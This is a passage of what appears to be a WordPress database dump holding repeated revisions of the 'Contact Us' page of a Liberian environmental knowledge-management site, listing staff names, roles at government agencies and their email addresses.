href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:30:09','2021-01-22 10:30:09','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3393,42,'2021-01-22 10:30:09','2021-01-22 10:30:09','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:30:09','2021-01-22 10:30:09','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3394,42,'2021-01-22 10:30:09','2021-01-22 10:30:09','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:30:09','2021-01-22 